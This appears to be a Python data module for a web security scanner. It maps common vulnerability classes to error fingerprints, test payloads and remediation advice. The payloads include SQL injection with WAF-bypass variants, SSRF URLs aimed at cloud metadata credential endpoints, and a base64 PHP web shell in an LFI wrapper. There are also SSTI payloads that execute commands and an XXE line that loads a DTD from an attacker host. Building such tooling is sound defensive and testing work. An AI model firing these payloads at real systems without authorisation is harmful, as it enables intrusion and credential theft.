"""Vulnerability fingerprints, payload library and remediation hints."""
from __future__ import annotations

from typing import Dict, List


VULN_PATTERNS: Dict[str, Dict] = {
    "sql_injection": {
        "severity": "HIGH",
        "indicators": [
            "you have an error in your sql syntax",
            "warning: mysql",
            "unclosed quotation mark after the character string",
            "quoted string not properly terminated",
            "ora-00933",
            "ora-01756",
            "pg_query",
            "sqlite3.operationalerror",
            "microsoft odbc driver",
            "sqlstate[",
            "native client error",
        ],
        "db_error_signatures": {
            "mysql": [
                "you have an error in your sql syntax",
                "warning: mysql",
                "mysql_fetch",
                "mysql_num_rows",
                "sqlstate[hy000]",
            ],
            "postgresql": [
                "pg_query",
                "pg_exec",
                "unterminated quoted string",
                "syntax error at or near",
                "invalid input syntax for",
                "current transaction is aborted",
            ],
            "mssql": [
                "unclosed quotation mark after the character string",
                "microsoft odbc driver",
                "native client error",
                "sqlstate[",
                "incorrect syntax near",
                "mssql_query",
            ],
            "sqlite": [
                "sqlite3.operationalerror",
                "unrecognized token",
                "sqlite error",
                "near \":\": syntax error",
                "sqlite3::exception",
            ],
            "oracle": [
                "ora-00933",
                "ora-01756",
                "ora-00921",
                "ora-01722",
                "ora-00936",
                "quoted string not properly terminated",
            ],
        },
        "error_payloads": ["'", "\"", "')", "';--", "\\'"],
        "boolean_true": [" AND 1=1-- -", "' AND '1'='1"],
        "boolean_false": [" AND 1=2-- -", "' AND '1'='2"],
        "time_payloads_mysql": [" AND SLEEP(5)-- -", "' AND SLEEP(5)-- -"],
        "time_payloads_pgsql": [" AND pg_sleep(5)-- -", "'; SELECT pg_sleep(5)-- -"],
        "time_payloads_mssql": ["; WAITFOR DELAY '0:0:5'-- -", "' WAITFOR DELAY '0:0:5'-- -"],
        "time_payloads_sqlite": [
            "' AND 1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))-- -",
        ],
        "time_payloads_oracle": [
            "' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)-- -",
            "' AND UTL_INADDR.GET_HOST_ADDRESS('non-existent-host')='1",
        ],
        "json_payloads": ["' AND JSON_EXTRACT(0x01,'$')-- -", "' AND json_type(0x01)-- -"],
        "waf_bypass_payloads": [
            "' /*!50000AND*/ 1=1-- -",
            "' %26%26 1=1-- -",
            "'+AND+1=1--+-",
            "' AND/**/ 1=1-- -",
        ],
        "recommendation": "Use parameterised queries / prepared statements; validate types; apply least-privilege DB accounts.",
    },
    "xss_reflected": {
        "severity": "MEDIUM",
        "indicators": ["<script>alert(", "onerror=alert(", "onfocus=alert("],
        "payloads": [
            "<script>alert(1)</script>",
            "\"><script>alert(1)</script>",
            "'><svg/onload=alert(1)>",
            "<img src=x onerror=alert(1)>",
            "javascript:alert(1)",
            "<details open ontoggle=alert(1)>",
            "<math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)>",
            "'-alert(1)-'",
            "${alert(1)}",
        ],
        "recommendation": "Contextual output encoding, strict CSP, input validation, HttpOnly/SameSite cookies.",
    },
    "ssrf": {
        "severity": "HIGH",
        "indicators": ["connection refused", "request reached", "169.254.169.254"],
        "payloads": [
            "http://127.0.0.1:80/",
            "http://localhost/",
            "http://169.254.169.254/latest/meta-data/",
            "http://[::1]/",
            "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
            "http://100.100.100.200/latest/meta-data/",
            "http://metadata.google.internal/computeMetadata/v1/",
            "http://169.254.169.254/metadata/v1/",
            "http://[0:0:0:0:0:ffff:127.0.0.1]/",
            "http://2130706433/",
            "gopher://127.0.0.1:25/",
        ],
        "recommendation": "Allow-list outbound destinations, block link-local / loopback IPs, validate URL schemes.",
    },
    "command_injection": {
        "severity": "CRITICAL",
        "indicators": ["uid=", "gid=", "root:x:", "Directory of ", "volume serial number"],
        "payloads": [
            "; sleep 5",
            "| sleep 5",
            "&& sleep 5",
            "`sleep 5`",
            "$(sleep 5)",
            "&& timeout 5",
        ],
        "recommendation": "Avoid shell invocation; use argv-based APIs; strict whitelist on input.",
    },
    "open_redirect": {
        "severity": "LOW",
        "payloads": [
            "//evil.example.com",
            "https://evil.example.com",
            "/\\evil.example.com",
            "//%09/evil.example.com",
            "/%2f%2fevil.example.com",
            "/\\.evil.example.com",
            "//evil.example.com/%2f%2e%2e",
            "data:text/html,<script>alert(1)</script>",
        ],
        "recommendation": "Validate redirect target against an allow-list.",
    },
    "sensitive_file": {
        "severity": "MEDIUM",
        "paths": [
            "/.git/config",
            "/.env",
            "/.DS_Store",
            "/.svn/entries",
            "/wp-config.php.bak",
            "/backup.zip",
            "/config.php.bak",
            "/phpinfo.php",
            "/server-status",
            "/actuator/env",
            "/actuator/health",
            "/.git/HEAD",
            "/.gitignore",
            "/.env.bak",
            "/.env.local",
            "/.env.production",
            "/.env.example",
            "/web.config",
            "/crossdomain.xml",
            "/.htpasswd",
            "/.htaccess",
            "/composer.json",
            "/package.json",
            "/Gemfile",
            "/requirements.txt",
            "/wp-config.php",
            "/configuration.php",
            "/.well-known/security.txt",
            "/debug/vars",
            "/debug/pprof",
            "/_profiler/phpinfo",
            "/swagger-ui.html",
            "/swagger-ui/index.html",
            "/v2/api-docs",
            "/v3/api-docs",
            "/openapi.json",
            "/graphql",
            "/graphiql",
            "/actuator/configprops",
            "/actuator/heapdump",
            "/actuator/mappings",
            "/actuator/beans",
            "/actuator/loggers",
            "/elmah.axd",
            "/trace.axd",
            "/info.php",
        ],
        "recommendation": "Remove exposed files from the web root and add CI checks to block leakage.",
    },
    "ssti": {
        "severity": "CRITICAL",
        "indicators": [
            "49",
            "7777777",
            "smarty_internal_data",
            "template syntax error",
            "jinja2.exceptions",
            "twig\\\\error",
            "freemarker.core",
        ],
        "detection_payloads": {
            "generic": ["{{7*7}}", "${7*7}", "<%= 7*7 %>", "{7*7}", "#{7*7}"],
            "jinja2": [
                "{{7*7}}",
                "{{config.items()}}",
                "{{''.__class__.__mro__[1].__subclasses__()}}",
            ],
            "twig": [
                "{{7*'7'}}",
                "{{dump(app)}}",
                "{{['id']|filter('system')}}",
            ],
            "django": [
                "{% debug %}",
                "{{settings.SECRET_KEY}}",
            ],
            "freemarker": [
                "${7*7}",
                "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"id\")}",
            ],
            "erb": [
                "<%= 7*7 %>",
                "<%= system('id') %>",
            ],
        },
        "recommendation": "Never render user input as template source; use sandboxed template engines; apply strict input validation.",
    },
    "lfi": {
        "severity": "HIGH",
        "indicators": [
            "root:x:0:0",
            "[fonts]",
            "[extensions]",
            "\\[boot loader\\]",
            "PATH=",
            "HOME=",
        ],
        "payloads": {
            "unix": [
                "../../../../etc/passwd",
                "....//....//....//....//etc/passwd",
                "..%2f..%2f..%2f..%2fetc/passwd",
                "..%252f..%252f..%252f..%252fetc/passwd",
                "/proc/self/environ",
                "/proc/self/cmdline",
            ],
            "windows": [
                "..\\..\\..\\..\\windows\\win.ini",
                "..%5c..%5c..%5c..%5cwindows\\win.ini",
                "....\\\\....\\\\....\\\\....\\\\windows\\win.ini",
            ],
            "php_wrappers": [
                "php://filter/convert.base64-encode/resource=index.php",
                "php://input",
                "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=",
                "expect://id",
            ],
            "null_byte": [
                "../../../../etc/passwd%00",
                "../../../../etc/passwd%00.jpg",
            ],
        },
        "recommendation": "Use allow-list for file paths; avoid user input in file operations; disable unnecessary PHP wrappers; chroot file access.",
    },
    "xxe": {
        "severity": "CRITICAL",
        "indicators": [
            "root:x:0:0",
            "ENTITY",
            "SYSTEM",
            "DOCTYPE",
            "ami-id",
        ],
        "payloads": {
            "file_read": [
                "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><root>&xxe;</root>",
                "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///c:/windows/win.ini\">]><root>&xxe;</root>",
            ],
            "ssrf": [
                "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://169.254.169.254/latest/meta-data/\">]><root>&xxe;</root>",
            ],
            "oob_exfil": [
                "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"http://attacker.com/evil.dtd\">%xxe;]><root/>",
            ],
            "svg_upload": [
                "<?xml version=\"1.0\"?><!DOCTYPE svg [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><svg xmlns=\"http://www.w3.org/2000/svg\"><text>&xxe;</text></svg>",
            ],
        },
        "recommendation": "Disable external entity processing in XML parsers; use JSON instead of XML where possible; validate/sanitise XML input.",
    },
    "security_headers": {
        "severity": "LOW",
        "required": [
            "content-security-policy",
            "strict-transport-security",
            "x-content-type-options",
            "x-frame-options",
            "referrer-policy",
        ],
        "recommendation": "Set recommended HTTP security headers via reverse proxy or framework middleware.",
    },
    "cors_misconfiguration": {
        "severity": "MEDIUM",
        "indicators": [
            "access-control-allow-origin: *",
            "access-control-allow-credentials: true",
        ],
        "test_origins": [
            "https://evil.example.com",
            "null",
            "https://target.com.evil.com",
        ],
        "recommendation": "Restrict CORS to trusted origins; never reflect arbitrary Origin with credentials enabled.",
    },
    "idor": {
        "severity": "HIGH",
        "indicators": ["different user data returned", "unauthorized access to resource"],
        "test_patterns": [
            "Replace numeric ID with 1, 2, 0, 999999",
            "Replace UUID with another user's UUID",
            "Try negative IDs or special values",
        ],
        "recommendation": "Enforce object-level authorization checks; use indirect references or ownership validation.",
    },
    "jwt_weakness": {
        "severity": "HIGH",
        "indicators": ["eyJ", "invalid signature", "jwt", "token"],
        "attack_vectors": {
            "alg_none": ["Set alg to 'none' and remove signature"],
            "weak_secret": ["test123", "secret", "password", "key", "1234567890", "admin"],
            "kid_injection": ["../../etc/passwd", "/dev/null"],
        },
        "recommendation": "Use strong asymmetric algorithms (RS256/ES256); validate all JWT claims server-side; rotate keys regularly.",
    },
    "crlf_injection": {
        "severity": "MEDIUM",
        "indicators": ["set-cookie:", "location:", "x-injected:"],
        "payloads": [
            "%0d%0aX-Injected: true",
            "%0aX-Injected: true",
            "\\r\\nX-Injected: true",
            "%E5%98%8A%E5%98%8DX-Injected: true",
        ],
        "recommendation": "Strip CR/LF characters from user input used in HTTP headers; use framework-level header APIs.",
    },
    "insecure_deserialization": {
        "severity": "CRITICAL",
        "indicators": {
            "java": ["java.io.ObjectInputStream", "ClassNotFoundException", "java.lang.Runtime", "rO0AB"],
            "php": ["O:4:", "unserialize()", "PHP Fatal error"],
            "python": ["pickle", "cPickle", "yaml.load", "__reduce__"],
            "dotnet": ["TypeNameHandling", "ObjectDataProvider", "$type"],
        },
        "recommendation": "Avoid native deserialization of untrusted data; use safe formats (JSON); implement integrity checks.",
    },
    "http_request_smuggling": {
        "severity": "HIGH",
        "indicators": ["400 Bad Request", "connection reset", "unexpected response"],
        "payloads": {
            "cl_te": "POST / HTTP/1.1\\r\\nHost: target\\r\\nContent-Length: 6\\r\\nTransfer-Encoding: chunked\\r\\n\\r\\n0\\r\\n\\r\\nG",
            "te_cl": "POST / HTTP/1.1\\r\\nHost: target\\r\\nContent-Length: 3\\r\\nTransfer-Encoding: chunked\\r\\n\\r\\n1\\r\\nG\\r\\n0\\r\\n\\r\\n",
        },
        "recommendation": "Normalize Transfer-Encoding handling; disable HTTP/1.1 connection reuse where possible; use HTTP/2 end-to-end.",
    },
    "prototype_pollution": {
        "severity": "HIGH",
        "indicators": ["[object Object]", "polluted", "__proto__"],
        "payloads": [
            '{"__proto__": {"polluted": true}}',
            '{"constructor": {"prototype": {"polluted": true}}}',
            "?__proto__[polluted]=true",
            "?constructor.prototype.polluted=true",
        ],
        "recommendation": "Freeze Object.prototype; validate/sanitize JSON keys; use Map instead of plain objects for user data.",
    },
    "graphql_introspection": {
        "severity": "LOW",
        "indicators": ["__schema", "__type", "queryType"],
        "payloads": {
            "introspection": '{"query":"{__schema{queryType{name}mutationType{name}types{name fields{name}}}}"}',
            "field_suggestion": '{"query":"{__type(name:\\"User\\"){fields{name type{name}}}}"}',
        },
        "recommendation": "Disable introspection in production; implement query depth/complexity limits; use persisted queries.",
    },
}


SEVERITY_REMEDIATION: Dict[str, str] = {
    "CRITICAL": "Patch or mitigate within 24h; restrict exposure immediately.",
    "HIGH": "Patch within 7 days; add WAF virtual patch as interim.",
    "MEDIUM": "Patch within 30 days; add monitoring.",
    "LOW": "Track in backlog; fix in next release.",
    "INFO": "No action required; informational only.",
}
